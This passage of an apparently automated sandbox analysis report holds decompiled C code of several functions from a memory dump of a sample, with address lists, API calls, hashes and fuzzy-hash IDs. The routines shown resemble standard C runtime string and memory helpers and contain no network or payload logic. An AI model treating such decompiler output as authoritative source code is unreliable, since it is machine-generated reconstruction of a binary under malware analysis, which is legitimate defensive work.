                                                							return E00C17193(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
                                                						}
                                                						goto L51;
                                                					}
                                                					asm("sbb eax, eax");
                                                					_t167 = _t166 | 0x00000001;
                                                					__eflags = _t167;
                                                					goto L8;
                                                				}
                                                				L51:
                                                			}

































































                                                0x00c220e8
                                                0x00c220f3
                                                0x00c220fa
                                                0x00c220fd
                                                0x00c220fe
                                                0x00c22101
                                                0x00c22105
                                                0x00c22106
                                                0x00c22109
                                                0x00c22119
                                                0x00c2213c
                                                0x00c22141
                                                0x00c22146
                                                0x00c223fc
                                                0x00c223fc
                                                0x00c223fc
                                                0x00000000
                                                0x00c2214c
                                                0x00c2214c
                                                0x00c2214f
                                                0x00c22152
                                                0x00c22158
                                                0x00c2215e
                                                0x00c22161
                                                0x00c22163
                                                0x00c22166
                                                0x00c22170
                                                0x00c22176
                                                0x00000000
                                                0x00000000
                                                0x00c2217c
                                                0x00c221a5
                                                0x00c221a5
                                                0x00c2217e
                                                0x00c2217e
                                                0x00c22186
                                                0x00c2218d
                                                0x00c22193
                                                0x00000000
                                                0x00c22195
                                                0x00c22195
                                                0x00c22198
                                                0x00c221a3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c221a3
                                                0x00c22193
                                                0x00c221b2
                                                0x00c221b4
                                                0x00c221bd
                                                0x00c221c3
                                                0x00c221c6
                                                0x00c221c6
                                                0x00c221c9
                                                0x00c221cc
                                                0x00c221cc
                                                0x00c221dc
                                                0x00c221ea
                                                0x00c221ef
                                                0x00c221f6
                                                0x00c221f8
                                                0x00000000
                                                0x00c221fe
                                                0x00c22204
                                                0x00c22211
                                                0x00c2221a
                                                0x00c22220
                                                0x00c2222d
                                                0x00c22234
                                                0x00c22239
                                                0x00c2223c
                                                0x00c2223e
                                                0x00c2247c
                                                0x00c22482
                                                0x00c22483
                                                0x00c22484
                                                0x00c22485
                                                0x00c22486
                                                0x00c22487
                                                0x00c2248c
                                                0x00c2248f
                                                0x00c22492
                                                0x00c22493
                                                0x00c224a5
                                                0x00c224aa
                                                0x00c224ac
                                                0x00c224b5
                                                0x00000000
                                                0x00c224b5
                                                0x00c224ae
                                                0x00c224b1
                                                0x00c224b3
                                                0x00000000
                                                0x00000000
                                                0x00c224bb
                                                0x00c22244
                                                0x00c22244
                                                0x00c22252
                                                0x00c22255
                                                0x00c2226b
                                                0x00c22272
                                                0x00c22277
                                                0x00c22257
                                                0x00c22257
                                                0x00c2225f
                                                0x00000000
                                                0x00c22261
                                                0x00c22261
                                                0x00c22267
                                                0x00c22267
                                                0x00c2225f
                                                0x00c2227e
                                                0x00c22285
                                                0x00c22288
                                                0x00c22386
                                                0x00c22389
                                                0x00c22396
                                                0x00c22399
                                                0x00c223a1
                                                0x00c223a1
                                                0x00c2238b
                                                0x00c22391
                                                0x00c22391
                                                0x00c2228e
                                                0x00c2228e
                                                0x00c2229a
                                                0x00c222a0
                                                0x00c222a6
                                                0x00c222a9
                                                0x00c222af
                                                0x00c222b2
                                                0x00c222b5
                                                0x00000000
                                                0x00000000
                                                0x00c222b7
                                                0x00c222c0
                                                0x00c222c4
                                                0x00c222cd
                                                0x00c222d1
                                                0x00c222d2
                                                0x00c222d8
                                                0x00c222de
                                                0x00c222e4
                                                0x00c222e7
                                                0x00000000
                                                0x00000000
                                                0x00c222e9
                                                0x00c22308
                                                0x00c22308
                                                0x00c2230b
                                                0x00c22328
                                                0x00c2232d
                                                0x00c22330
                                                0x00c22332
                                                0x00c22370
                                                0x00c22334
                                                0x00c22334
                                                0x00c2233a
                                                0x00c2233f
                                                0x00c22347
                                                0x00c22348
                                                0x00c22348
                                                0x00c2235f
                                                0x00c22366
                                                0x00c22369
                                                0x00c2236b
                                                0x00c2236b
                                                0x00c22376
                                                0x00c2237c
                                                0x00c2237c
                                                0x00c22381
                                                0x00000000
                                                0x00c22381
                                                0x00c222eb
                                                0x00c222ed
                                                0x00c222f2
                                                0x00c222f8
                                                0x00c22301
                                                0x00c22304
                                                0x00c22304
                                                0x00000000
                                                0x00c222ed
                                                0x00c223a4
                                                0x00c223a4
                                                0x00c223a8
                                                0x00c223b0
                                                0x00c223b6
                                                0x00c223b9
                                                0x00c223bf
                                                0x00c223c1
                                                0x00c2240d
                                                0x00c22413
                                                0x00c2245f
                                                0x00c2245f
                                                0x00c22415
                                                0x00c2241a
                                                0x00c2241a
                                                0x00c22420
                                                0x00c22424
                                                0x00000000
                                                0x00c22426
                                                0x00c2242a
                                                0x00c22433
                                                0x00c2243f
                                                0x00c22444
                                                0x00c2244d
                                                0x00c22453
                                                0x00c22456
                                                0x00c22456
                                                0x00c22424
                                                0x00c22465
                                                0x00c2246d
                                                0x00c22473
                                                0x00c22476
                                                0x00c223c3
                                                0x00c223c9
                                                0x00c223d3
                                                0x00c223e5
                                                0x00c223ec
                                                0x00c223f9
                                                0x00000000
                                                0x00c223f9
                                                0x00000000
                                                0x00c223c1
                                                0x00c2223e
                                                0x00c221b6
                                                0x00c221b6
                                                0x00c223fe
                                                0x00c22401
                                                0x00c22402
                                                0x00c22405
                                                0x00c2240c
                                                0x00c2240c
                                                0x00000000
                                                0x00c221b4
                                                0x00c221ad
                                                0x00c221af
                                                0x00c221af
                                                0x00000000
                                                0x00c221af
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                • _free.LIBCMT ref: 00C223D3
                                                • _free.LIBCMT ref: 00C223EC
                                                • _free.LIBCMT ref: 00C2242A
                                                • _free.LIBCMT ref: 00C22433
                                                • _free.LIBCMT ref: 00C2243F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast
                                                • String ID:
                                                • API String ID: 3291180501-0
                                                • Opcode ID: 84f3d9a7a3c4acbaedadf32ba4b9aa215e24cf30d1e8f2f3b1a3e0b35143c3f5
                                                • Instruction ID: 9116b1cdb9bc9fdff37ab585310d45d6a3b864d06dd36e12df5c473b064a81c4
                                                • Opcode Fuzzy Hash: 84f3d9a7a3c4acbaedadf32ba4b9aa215e24cf30d1e8f2f3b1a3e0b35143c3f5
                                                • Instruction Fuzzy Hash: 5CB16B75901629EFDB24DF18D884BADB3B5FF58314F1045AAE94AA7760DB30AE90CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E00C32085(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
                                                				signed int _v8;
                                                				char _v22;
                                                				struct _cpinfo _v28;
                                                				intOrPtr* _v32;
                                                				signed int _v36;
                                                				intOrPtr* _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				void* _v60;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t55;
                                                				intOrPtr* _t60;
                                                				int _t62;
                                                				signed int _t65;
                                                				signed int _t66;
                                                				intOrPtr* _t67;
                                                				void* _t69;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				intOrPtr* _t77;
                                                				char* _t79;
                                                				char* _t80;
                                                				intOrPtr _t95;
                                                				intOrPtr _t96;
                                                				intOrPtr* _t102;
                                                				signed int _t104;
                                                				void* _t105;
                                                				intOrPtr* _t107;
                                                				void* _t108;
                                                				intOrPtr* _t109;
                                                
                                                				_t55 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t55 ^ _t104;
                                                				_t103 = _a20;
                                                				_v44 = _a4;
                                                				_v48 = _a8;
                                                				_t59 = _a24;
                                                				_v40 = _a24;
                                                				_t102 = _a16;
                                                				_v36 = _t102;
                                                				if(_t103 <= 0) {
                                                					if(_t103 < 0xffffffff) {
                                                						goto L60;
                                                					} else {
                                                						goto L3;
                                                					}
                                                				} else {
                                                					_t103 = E00C203DF(_t102, _t103);
                                                					_t59 = _v40;
                                                					L3:
                                                					_t85 = _a28;
                                                					if(_t85 <= 0) {
                                                						if(_t85 < 0xffffffff) {
                                                							goto L60;
                                                						} else {
                                                							goto L6;
                                                						}
                                                					} else {
                                                						_t85 = E00C203DF(_t59, _t85);
                                                						L6:
                                                						_t62 = _a32;
                                                						if(_t62 == 0) {
                                                							_t62 =  *( *_v44 + 8);
                                                							_a32 = _t62;
                                                						}
                                                						if(_t103 == 0 || _t85 == 0) {
                                                							if(_t103 == _t85) {
                                                								L59:
                                                								_push(2);
                                                								goto L22;
                                                							} else {
                                                								if(_t85 > 1) {
                                                									L31:
                                                									_t60 = 1;
                                                								} else {
                                                									if(_t103 > 1) {
                                                										L21:
                                                										_push(3);
                                                										goto L22;
                                                									} else {
                                                										if(GetCPInfo(_t62,  &_v28) == 0) {
                                                											goto L60;
                                                										} else {
                                                											if(_t103 <= 0) {
                                                												if(_t85 <= 0) {
                                                													goto L32;
                                                												} else {
                                                													if(_v28 >= 2) {
                                                														_t79 =  &_v22;
                                                														if(_v22 != 0) {
                                                															_t103 = _v40;
                                                															while(1) {
                                                																_t95 =  *((intOrPtr*)(_t79 + 1));
                                                																if(_t95 == 0) {
                                                																	goto L31;
                                                																}
                                                																_t101 =  *_t103;
                                                																if(_t101 <  *_t79 || _t101 > _t95) {
                                                																	_t79 = _t79 + 2;
                                                																	if( *_t79 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L31;
                                                																	}
                                                																} else {
                                                																	goto L59;
                                                																}
                                                																goto L61;
                                                															}
                                                														}
                                                													}
                                                													goto L31;
                                                												}
                                                											} else {
                                                												if(_v28 >= 2) {
                                                													_t80 =  &_v22;
                                                													if(_v22 != 0) {
                                                														while(1) {
                                                															_t96 =  *((intOrPtr*)(_t80 + 1));
                                                															if(_t96 == 0) {
                                                																goto L21;
                                                															}
                                                															_t101 =  *_t102;
                                                															if(_t101 <  *_t80 || _t101 > _t96) {
                                                																_t80 = _t80 + 2;
                                                																if( *_t80 != 0) {
                                                																	continue;
                                                																} else {
                                                																	goto L21;
                                                																}
                                                															} else {
                                                																goto L59;
                                                															}
                                                															goto L22;
                                                														}
                                                													}
                                                												}
                                                												goto L21;
                                                												L22:
                                                												_pop(_t60);
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							L32:
                                                							_t102 = 0;
                                                							_t65 = E00C29B05(_a32, 9, _v36, _t103, 0, 0);
                                                							_t107 = _t105 + 0x18;
                                                							_v44 = _t65;
                                                							if(_t65 == 0) {
                                                								L60:
                                                								_t60 = 0;
                                                							} else {
                                                								_t101 = _t65 + _t65 + 8;
                                                								asm("sbb eax, eax");
                                                								_t66 = _t65 & _t65 + _t65 + 0x00000008;
                                                								if(_t66 == 0) {
                                                									_t67 = 0;
                                                									_v32 = 0;
                                                									goto L41;
                                                								} else {
                                                									if(_t66 > 0x400) {
                                                										_t77 = E00C22FD9(_t66);
                                                										_v32 = _t77;
                                                										if(_t77 == 0) {
                                                											goto L57;
                                                										} else {
                                                											 *_t77 = 0xdddd;
                                                											goto L39;
                                                										}
                                                									} else {
                                                										E00C17770(_t66);
                                                										_t77 = _t107;
                                                										_v32 = _t77;
                                                										if(_t77 == 0) {
                                                											L57:
                                                											_t85 = _v32;
                                                										} else {
                                                											 *_t77 = 0xcccc;
                                                											L39:
                                                											_t67 = _t77 + 8;
                                                											_v32 = _t67;
                                                											L41:
                                                											if(_t67 == 0) {
                                                												goto L57;
                                                											} else {
                                                												_t103 = _a32;
                                                												_t69 = E00C29B05(_a32, 1, _v36, _a32, _t67, _v44);
                                                												_t108 = _t107 + 0x18;
                                                												if(_t69 == 0) {
                                                													goto L57;
                                                												} else {
                                                													_t70 = E00C29B05(_t103, 9, _v40, _t85, _t102, _t102);
                                                													_t109 = _t108 + 0x18;
                                                													_v36 = _t70;
                                                													if(_t70 == 0) {
                                                														goto L57;
                                                													} else {
                                                														_t101 = _t70 + _t70 + 8;
                                                														asm("sbb eax, eax");
                                                														_t71 = _t70 & _t70 + _t70 + 0x00000008;
                                                														if(_t71 == 0) {
                                                															_t103 = _t102;
                                                															goto L52;
                                                														} else {
                                                															if(_t71 > 0x400) {
                                                																_t103 = E00C22FD9(_t71);
                                                																if(_t103 == 0) {
                                                																	goto L55;
                                                																} else {
                                                																	 *_t103 = 0xdddd;
                                                																	goto L50;
                                                																}
                                                															} else {
                                                																E00C17770(_t71);
                                                																_t103 = _t109;
                                                																if(_t103 == 0) {
                                                																	L55:
                                                																	_t85 = _v32;
                                                																} else {
                                                																	 *_t103 = 0xcccc;
                                                																	L50:
                                                																	_t103 = _t103 + 8;
                                                																	L52:
                                                																	if(_t103 == 0 || E00C29B05(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
                                                																		goto L55;
                                                																	} else {
                                                																		_t85 = _v32;
                                                																		_t102 = E00C255B3(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
                                                																	}
                                                																}
                                                															}
                                                														}
                                                														E00C17175(_t103);
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								E00C17175(_t85);
                                                								_t60 = _t102;
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L61:
                                                				return E00C17193(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
                                                			}



































                                                0x00c3208d
                                                0x00c32094
                                                0x00c3209c
                                                0x00c3209f
                                                0x00c320a5
                                                0x00c320a8
                                                0x00c320ab
                                                0x00c320af
                                                0x00c320b2
                                                0x00c320b7
                                                0x00c320cc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c320b9
                                                0x00c320c1
                                                0x00c320c3
                                                0x00c320d2
                                                0x00c320d2
                                                0x00c320d7
                                                0x00c320e9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c320d9
                                                0x00c320e2
                                                0x00c320ef
                                                0x00c320ef
                                                0x00c320f4
                                                0x00c320fb
                                                0x00c320fe
                                                0x00c320fe
                                                0x00c32103
                                                0x00c3210f
                                                0x00c322f5
                                                0x00c322f5
                                                0x00000000
                                                0x00c32115
                                                0x00c32118
                                                0x00c321a1
                                                0x00c321a3
                                                0x00c3211e
                                                0x00c32121
                                                0x00c32166
                                                0x00c32166
                                                0x00000000
                                                0x00c32123
                                                0x00c32130
                                                0x00000000
                                                0x00c32136
                                                0x00c32138
                                                0x00c32170
                                                0x00000000
                                                0x00c32172
                                                0x00c32176
                                                0x00c3217c
                                                0x00c3217f
                                                0x00c32181
                                                0x00c32184
                                                0x00c32184
                                                0x00c32189
                                                0x00000000
                                                0x00000000
                                                0x00c3218b
                                                0x00c3218f
                                                0x00c32199
                                                0x00c3219f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c3218f
                                                0x00c32184
                                                0x00c3217f
                                                0x00000000
                                                0x00c32176
                                                0x00c3213a
                                                0x00c3213e
                                                0x00c32144
                                                0x00c32147
                                                0x00c32149
                                                0x00c32149
                                                0x00c3214e
                                                0x00000000
                                                0x00000000
                                                0x00c32150
                                                0x00c32154
                                                0x00c3215e
                                                0x00c32164
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c32154
                                                0x00c32149
                                                0x00c32147
                                                0x00000000
                                                0x00c32168
                                                0x00c32168
                                                0x00c32168
                                                0x00c32138
                                                0x00c32130
                                                0x00c32121
                                                0x00c32118
                                                0x00c321a9
                                                0x00c321a9
                                                0x00c321a9
                                                0x00c321b6
                                                0x00c321bb
                                                0x00c321be
                                                0x00c321c3
                                                0x00c322fc
                                                0x00c322fc
                                                0x00c321c9
                                                0x00c321cc
                                                0x00c321d1
                                                0x00c321d3
                                                0x00c321d5
                                                0x00c32218
                                                0x00c3221a
                                                0x00000000
                                                0x00c321d7
                                                0x00c321dc
                                                0x00c321f9
                                                0x00c321fe
                                                0x00c32204
                                                0x00000000
                                                0x00c3220a
                                                0x00c3220a
                                                0x00000000
                                                0x00c3220a
                                                0x00c321de
                                                0x00c321de
                                                0x00c321e3
                                                0x00c321e5
                                                0x00c321ea
                                                0x00c322e7
                                                0x00c322e7
                                                0x00c321f0
                                                0x00c321f0
                                                0x00c32210
                                                0x00c32210
                                                0x00c32213
                                                0x00c3221d
                                                0x00c3221f
                                                0x00000000
                                                0x00c32225
                                                0x00c3222d
                                                0x00c32233
                                                0x00c32238
                                                0x00c3223d
                                                0x00000000
                                                0x00c32243
                                                0x00c3224c
                                                0x00c32251
                                                0x00c32254
                                                0x00c32259
                                                0x00000000
                                                0x00c3225f
                                                0x00c32262
                                                0x00c32267
                                                0x00c32269
                                                0x00c3226b
                                                0x00c3229f
                                                0x00000000
                                                0x00c3226d
                                                0x00c32272
                                                0x00c3228d
                                                0x00c32292
                                                0x00000000
                                                0x00c32294
                                                0x00c32294
                                                0x00000000
                                                0x00c32294
                                                0x00c32274
                                                0x00c32274
                                                0x00c32279
                                                0x00c3227d
                                                0x00c322db
                                                0x00c322db
                                                0x00c3227f
                                                0x00c3227f
                                                0x00c3229a
                                                0x00c3229a
                                                0x00c322a1
                                                0x00c322a3
                                                0x00000000
                                                0x00c322be
                                                0x00c322be
                                                0x00c322d7
                                                0x00c322d7
                                                0x00c322a3
                                                0x00c3227d
                                                0x00c32272
                                                0x00c322df
                                                0x00c322e4
                                                0x00c32259
                                                0x00c3223d
                                                0x00c3221f
                                                0x00c321ea
                                                0x00c321dc
                                                0x00c322eb
                                                0x00c322f1
                                                0x00c322f1
                                                0x00c321c3
                                                0x00c32103
                                                0x00c320d7
                                                0x00c322fe
                                                0x00c3230f

                                                APIs
                                                • GetCPInfo.KERNEL32(0166E6B8,0166E6B8,?,7FFFFFFF,?,?,00C32341,0166E6B8,0166E6B8,?,0166E6B8,?,?,?,?,0166E6B8), ref: 00C32128
                                                • __alloca_probe_16.LIBCMT ref: 00C321DE
                                                • __alloca_probe_16.LIBCMT ref: 00C32274
                                                • __freea.LIBCMT ref: 00C322DF
                                                • __freea.LIBCMT ref: 00C322EB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __alloca_probe_16__freea$Info
                                                • String ID:
                                                • API String ID: 2330168043-0
                                                • Opcode ID: 66d06ced5600f0be4c9ee2462acbb3bab9a6983e46d38061f918b5c3a039d86d
                                                • Instruction ID: dca3d430e45b3e41aed8f92ea3632fbe2871f561a7a5639fc3f6f56955c310a0
                                                • Opcode Fuzzy Hash: 66d06ced5600f0be4c9ee2462acbb3bab9a6983e46d38061f918b5c3a039d86d
                                                • Instruction Fuzzy Hash: BA81F272D20219ABDF318FA5CD81EEF7BB5AF09360F190155ED24A7251D636CE40EBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00C2812E(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				void* _v24;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t41;
                                                				signed int _t49;
                                                				void* _t51;
                                                				signed int _t55;
                                                				intOrPtr _t63;
                                                				intOrPtr _t69;
                                                				void* _t71;
                                                				intOrPtr* _t72;
                                                				intOrPtr _t86;
                                                				void* _t89;
                                                				intOrPtr* _t91;
                                                				intOrPtr _t93;
                                                				void* _t94;
                                                				void* _t95;
                                                				signed int _t96;
                                                				void* _t97;
                                                				intOrPtr* _t98;
                                                				intOrPtr* _t100;
                                                				void* _t103;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t41 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t41 ^ _t96;
                                                				_t93 = _a20;
                                                				if(_t93 > 0) {
                                                					_t69 = E00C203DF(_a16, _t93);
                                                					_t103 = _t69 - _t93;
                                                					_t4 = _t69 + 1; // 0x1
                                                					_t93 = _t4;
                                                					if(_t103 >= 0) {
                                                						_t93 = _t69;
                                                					}
                                                				}
                                                				_t88 = _a32;
                                                				if(_a32 == 0) {
                                                					_t88 =  *((intOrPtr*)( *_a4 + 8));
                                                					_a32 =  *((intOrPtr*)( *_a4 + 8));
                                                				}
                                                				_t86 = E00C29B05(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
                                                				_t98 = _t97 + 0x18;
                                                				_v12 = _t86;
                                                				if(_t86 == 0) {
                                                					L39:
                                                					_pop(_t89);
                                                					_pop(_t94);
                                                					_pop(_t71);
                                                					return E00C17193(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
                                                				} else {
                                                					_t17 = _t86 + _t86 + 8; // 0x8
                                                					asm("sbb eax, eax");
                                                					_t49 = _t86 + _t86 & _t17;
                                                					if(_t49 == 0) {
                                                						_t72 = 0;
                                                						L15:
                                                						if(_t72 == 0) {
                                                							L37:
                                                							_t95 = 0;
                                                							L38:
                                                							E00C17175(_t72);
                                                							_t46 = _t95;
                                                							goto L39;
                                                						}
                                                						_t51 = E00C29B05(_t88, 1, _a16, _t93, _t72, _t86);
                                                						_t100 = _t98 + 0x18;
                                                						if(_t51 == 0) {
                                                							goto L37;
                                                						}
                                                						_t90 = _v12;
                                                						_t95 = E00C258A0(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
                                                						if(_t95 == 0) {
                                                							goto L37;
                                                						}
                                                						_t86 = 0x400;
                                                						if((_a12 & 0x00000400) == 0) {
                                                							_t31 = _t95 + _t95 + 8; // 0x8
                                                							asm("sbb eax, eax");
                                                							_t55 = _t95 + _t95 & _t31;
                                                							if(_t55 == 0) {
                                                								_t91 = 0;
                                                								L31:
                                                								if(_t91 == 0 || E00C258A0(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
                                                									L36:
                                                									E00C17175(_t91);
                                                									goto L37;
                                                								} else {
                                                									_push(0);
                                                									_push(0);
                                                									if(_a28 != 0) {
                                                										_push(_a28);
                                                										_push(_a24);
                                                									} else {
                                                										_push(0);
                                                										_push(0);
                                                									}
                                                									_push(_t95);
                                                									_push(_t91);
                                                									_push(0);
                                                									_push(_a32);
                                                									_t95 = E00C29B81();
                                                									if(_t95 != 0) {
                                                										E00C17175(_t91);
                                                										goto L38;
                                                									} else {
                                                										goto L36;
                                                									}
                                                								}
                                                							}
                                                							if(_t55 > 0x400) {
                                                								_t91 = E00C22FD9(_t55);
                                                								if(_t91 == 0) {
                                                									goto L36;
                                                								}
                                                								 *_t91 = 0xdddd;
                                                								L29:
                                                								_t91 = _t91 + 8;
                                                								goto L31;
                                                							}
                                                							E00C17770(_t55);
                                                							_t91 = _t100;
                                                							if(_t91 == 0) {
                                                								goto L36;
                                                							}
                                                							 *_t91 = 0xcccc;
                                                							goto L29;
                                                						}
                                                						_t63 = _a28;
                                                						if(_t63 == 0) {
                                                							goto L38;
                                                						}
                                                						if(_t95 > _t63) {
                                                							goto L37;
                                                						}
                                                						_t95 = E00C258A0(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
                                                						if(_t95 != 0) {
                                                							goto L38;
                                                						}
                                                						goto L37;
                                                					}
                                                					if(_t49 > 0x400) {
                                                						_t72 = E00C22FD9(_t49);
                                                						if(_t72 == 0) {
                                                							L13:
                                                							_t86 = _v12;
                                                							goto L15;
                                                						}
                                                						 *_t72 = 0xdddd;
                                                						L12:
                                                						_t72 = _t72 + 8;
                                                						goto L13;
                                                					}
                                                					E00C17770(_t49);
                                                					_t72 = _t98;
                                                					if(_t72 == 0) {
                                                						goto L13;
                                                					}
                                                					 *_t72 = 0xcccc;
                                                					goto L12;
                                                				}
                                                			}




























                                                0x00c28133
                                                0x00c28134
                                                0x00c28135
                                                0x00c2813c
                                                0x00c28141
                                                0x00c28147
                                                0x00c2814d
                                                0x00c28153
                                                0x00c28156
                                                0x00c28156
                                                0x00c28159
                                                0x00c2815b
                                                0x00c2815b
                                                0x00c28159
                                                0x00c2815d
                                                0x00c28162
                                                0x00c28169
                                                0x00c2816c
                                                0x00c2816c
                                                0x00c2818d
                                                0x00c2818f
                                                0x00c28192
                                                0x00c28197
                                                0x00c282f5
                                                0x00c282f8
                                                0x00c282f9
                                                0x00c282fa
                                                0x00c28306
                                                0x00c2819d
                                                0x00c281a0
                                                0x00c281a5
                                                0x00c281a7
                                                0x00c281a9
                                                0x00c281e0
                                                0x00c281e2
                                                0x00c281e4
                                                0x00c282ea
                                                0x00c282ea
                                                0x00c282ec
                                                0x00c282ed
                                                0x00c282f3
                                                0x00000000
                                                0x00c282f3
                                                0x00c281f3
                                                0x00c281f8
                                                0x00c281fd
                                                0x00000000
                                                0x00000000
                                                0x00c28203
                                                0x00c2821a
                                                0x00c2821e
                                                0x00000000
                                                0x00000000
                                                0x00c28224
                                                0x00c2822c
                                                0x00c28269
                                                0x00c2826e
                                                0x00c28270
                                                0x00c28272
                                                0x00c282a3
                                                0x00c282a5
                                                0x00c282a7
                                                0x00c282e3
                                                0x00c282e4
                                                0x00000000
                                                0x00c282c4
                                                0x00c282c6
                                                0x00c282c7
                                                0x00c282cb
                                                0x00c28307
                                                0x00c2830a
                                                0x00c282cd
                                                0x00c282cd
                                                0x00c282ce
                                                0x00c282ce
                                                0x00c282cf
                                                0x00c282d0
                                                0x00c282d1
                                                0x00c282d2
                                                0x00c282da
                                                0x00c282e1
                                                0x00c28310
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c282e1
                                                0x00c282a7
                                                0x00c28276
                                                0x00c28291
                                                0x00c28296
                                                0x00000000
                                                0x00000000
                                                0x00c28298
                                                0x00c2829e
                                                0x00c2829e
                                                0x00000000
                                                0x00c2829e
                                                0x00c28278
                                                0x00c2827d
                                                0x00c28281
                                                0x00000000
                                                0x00000000
                                                0x00c28283
                                                0x00000000
                                                0x00c28283
                                                0x00c2822e
                                                0x00c28233
                                                0x00000000
                                                0x00000000
                                                0x00c2823b
                                                0x00000000
                                                0x00000000
                                                0x00c28257
                                                0x00c2825b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c28261
                                                0x00c281b0
                                                0x00c281cb
                                                0x00c281d0
                                                0x00c281db
                                                0x00c281db
                                                0x00000000
                                                0x00c281db
                                                0x00c281d2
                                                0x00c281d8
                                                0x00c281d8
                                                0x00000000
                                                0x00c281d8
                                                0x00c281b2
                                                0x00c281b7
                                                0x00c281bb
                                                0x00000000
                                                0x00000000
                                                0x00c281bd
                                                0x00000000
                                                0x00c281bd

                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 00C281B2
                                                • __alloca_probe_16.LIBCMT ref: 00C28278
                                                • __freea.LIBCMT ref: 00C282E4
                                                  • Part of subcall function 00C22FD9: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C2AB63,00000220,?,?,?,?,?,?,00C1B9BE,?,?,?), ref: 00C2300B
                                                • __freea.LIBCMT ref: 00C282ED
                                                • __freea.LIBCMT ref: 00C28310
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
